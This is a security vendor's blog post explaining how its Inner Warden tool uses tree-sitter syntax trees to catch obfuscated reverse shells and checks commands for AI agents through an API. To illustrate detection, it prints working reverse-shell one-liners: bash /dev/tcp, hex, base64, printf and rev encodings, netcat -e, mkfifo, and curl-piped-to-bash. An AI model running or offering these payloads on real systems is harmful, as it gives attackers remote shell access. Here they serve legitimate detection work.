Skip to content
Threat Detection

How Inner Warden Catches Obfuscated Reverse Shells (Tree-Sitter AST, Not Regex)

10 min read

A reverse shell is the first thing an attacker establishes after gaining initial access. It connects your server back to the attacker's machine, giving them an interactive terminal. The problem: modern payloads are heavily obfuscated. They use hex encoding, base64 wrapping, printf substitution, and variable indirection to bypass every regex-based detection tool on the market.

Inner Warden does not use regex for command analysis. It parses commands into an Abstract Syntax Tree using tree-sitter and analyzes the structure, not the text. This catches obfuscated payloads that no pattern-matching tool can detect.

Why regex fails for reverse shell detection

A naive reverse shell looks like this:

Plain reverse shell
bash -i >& /dev/tcp/10.0.0.1/4444 0>&1

A regex can catch that. But attackers never send that. They send this:

Hex-encoded payload
echo -e '\x62\x61\x73\x68\x20\x2d\x69' | bash
Base64-wrapped payload
echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80NDQ0IDA+JjE= | base64 -d | bash
Printf substitution
$(printf '%s' 'bash' '-i' '>& /dev/tcp/10.0.0.1/4444')
Reversed string
echo '1>&0 4444/1.0.0.01/pct/ved/ &>i- hsab' | rev | bash

The string /dev/tcp never appears in the raw command. Neither does bash -i. Regex has nothing to match against. fail2ban, OSSEC, and most SIEM rules are blind to these payloads.

How tree-sitter AST analysis works

Instead of matching text, Inner Warden parses the command into a syntax tree using tree-sitter. The tree represents the structure of the command: pipes, redirections, subshells, command substitutions, and string operations. The analysis walks the tree looking for structural patterns, not string patterns.

For the hex-encoded example above, the AST reveals:

Node typepipeline
Left sideecho with hex escape sequences (\x62\x61...)
Right sidebash (shell interpreter)
Pattern matchEncoded data piped into interpreter = reverse shell

The key insight: regardless of how the payload is encoded, the AST structure always contains a pipeline where encoded or obfuscated data flows into a shell interpreter. Tree-sitter sees the structure. Regex sees the text.

Patterns Inner Warden detects

The check-command analysis engine covers these reverse shell families and obfuscation techniques:

PatternExampleAST signal
Python socketpython -c 'import socket...'socket.socket + connect + subprocess
Perl socketperl -e 'use Socket...'use Socket + open + exec
mkfifo pipemkfifo /tmp/f; cat /tmp/f | bashmkfifo + pipe into interpreter
Bash hex escapes$'\x62\x61\x73\x68'ANSI-C quoting with hex sequences
eval + base64eval $(echo ... | base64 -d)eval wrapping decoded substitution
printf build$(printf '\x2f\x64\x65\x76...')printf with hex in command substitution
rev pipeecho '...' | rev | bashstring reversal piped into interpreter
Download + executecurl http://x.x/s | bashnetwork fetch piped into interpreter
Netcat variantsnc -e /bin/sh 10.0.0.1 4444nc/ncat with -e flag + interpreter path

The check-command API

Inner Warden exposes a POST /api/agent/check-command endpoint that analyzes any command without executing it. This is designed for AI agents (OpenClaw, n8n, custom automation) that need to validate commands before running them.

Check an obfuscated reverse shell
curl -s http://localhost:9111/api/agent/check-command \
  -H "Content-Type: application/json" \
  -d '{"command": "echo YmFzaCAtaSA+Ji... | base64 -d | bash"}'
Response
{
  "safe": false,
  "risk": "critical",
  "reasons": [
    "base64 decode piped into shell interpreter (reverse shell pattern)",
    "encoded payload obscures true intent"
  ],
  "categories": ["reverse_shell", "obfuscation"]
}

A clean command returns "safe": true with no reasons. The analysis runs in under 5ms because tree-sitter parsing is compiled to native Rust. No network calls, no AI inference.

Comparison with regex-based tools

Tools like fail2ban, OSSEC, and most SIEM rules rely on regex patterns to detect malicious commands. This works for known, unobfuscated payloads. It fails for everything else.

CapabilityRegex toolsInner Warden (AST)
Plain reverse shellsDetectedDetected
Base64-encoded payloadsMissedDetected
Hex-escaped stringsMissedDetected
printf/rev obfuscationMissedDetected
Variable indirectionMissedDetected
Pre-execution analysisNoYes (API)
Latency~1ms<5ms

Set it up

The check-command endpoint is available on the agent dashboard. Install Inner Warden and the API is ready:

Install
curl -fsSL https://innerwarden.com/install | sudo bash

The exec_audit collector watches for suspicious commands in real time. The check-command API lets external tools validate commands before execution. Both use the same tree-sitter engine.

What to do next

  • Protect AI agents on your server - use the check-command API to validate every command your AI agent wants to run.
  • SSH honeypot setup - capture the reverse shell payloads attackers try to run on your server.
  • View on GitHub - the check-command engine is open source. Read the implementation, report false positives, contribute patterns.